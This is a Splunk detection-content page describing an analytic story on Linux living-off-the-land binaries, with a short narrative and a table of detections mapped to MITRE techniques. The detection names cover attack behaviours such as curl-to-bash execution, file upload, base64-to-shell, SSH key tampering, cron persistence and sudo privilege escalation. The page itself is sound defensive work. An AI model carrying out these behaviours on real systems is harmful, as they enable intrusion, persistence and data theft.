Try in Splunk Security Cloud

Description

Linux Living Off The Land consists of binaries that may be used to bypass local security restrictions within misconfigured systems.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2022-07-27
  • Author: Michael Haag, Splunk
  • ID: e405a2d7-dc8e-4227-8e9d-f60267b8c0cd

Narrative

Similar to Windows LOLBAS project, the GTFOBins project focuses solely on Unix binaries that may be abused in multiple categories including Reverse Shell, File Upload, File Download and much more. These binaries are native to the operating system and the functionality is typically native. The behaviors are typically not malicious by default or vulnerable, but these are built in functionality of the applications. When reviewing any notables or hunting through mountains of events of interest, it’s important to identify the binary, review command-line arguments, path of file, and capture any network and file modifications. Linux analysis may be a bit cumbersome due to volume and how process behavior is seen in EDR products. Piecing it together will require some effort.

Detections

Name Technique Type
Curl Download and Bash Execution Ingress Tool Transfer TTP
Linux AWK Privilege Escalation Sudo and Sudo Caching, Abuse Elevation Control Mechanism Anomaly
Linux Add Files In Known Crontab Directories Cron, Scheduled Task/Job Anomaly
Linux Adding Crontab Using List Parameter Cron, Scheduled Task/Job Hunting
Linux At Allow Config File Creation Cron, Scheduled Task/Job Anomaly
Linux At Application Execution At, Scheduled Task/Job Anomaly
Linux Change File Owner To Root Linux and Mac File and Directory Permissions Modification, File and Directory Permissions Modification Anomaly
Linux Clipboard Data Copy Clipboard Data Anomaly
Linux Common Process For Elevation Control Setuid and Setgid, Abuse Elevation Control Mechanism Hunting
Linux Curl Upload File Ingress Tool Transfer TTP
Linux Decode Base64 to Shell Obfuscated Files or Information, Unix Shell TTP
Linux Docker Privilege Escalation Sudo and Sudo Caching, Abuse Elevation Control Mechanism Anomaly
Linux Edit Cron Table Parameter Cron, Scheduled Task/Job Hunting
Linux Ingress Tool Transfer Hunting Ingress Tool Transfer Hunting
Linux Ingress Tool Transfer with Curl Ingress Tool Transfer Anomaly
Linux Node Privilege Escalation Sudo and Sudo Caching, Abuse Elevation Control Mechanism Anomaly
Linux Obfuscated Files or Information Base64 Decode Obfuscated Files or Information Anomaly
Linux Possible Access Or Modification Of sshd Config File SSH Authorized Keys, Account Manipulation Anomaly
Linux Possible Append Cronjob Entry on Existing Cronjob File Cron, Scheduled Task/Job Hunting
Linux Possible Cronjob Modification With Editor Cron, Scheduled Task/Job Hunting
Linux Possible Ssh Key File Creation SSH Authorized Keys, Account Manipulation Anomaly
Linux Proxy Socks Curl Proxy, Non-Application Layer Protocol TTP
Linux SSH Authorized Keys Modification SSH Authorized Keys Anomaly
Linux SSH Remote Services Script Execute SSH TTP
Linux Service File Created In Systemd Directory Systemd Timers, Scheduled Task/Job Anomaly
Linux Service Restarted Systemd Timers, Scheduled Task/Job Anomaly
Linux Service Started Or Enabled Systemd Timers, Scheduled Task/Job Anomaly
Linux Setuid Using Chmod Utility Setuid and Setgid, Abuse Elevation Control Mechanism Anomaly
Linux pkexec Privilege Escalation Exploitation for Privilege Escalation TTP
Suspicious Curl Network Connection Ingress Tool Transfer TTP

Reference

source | version: 1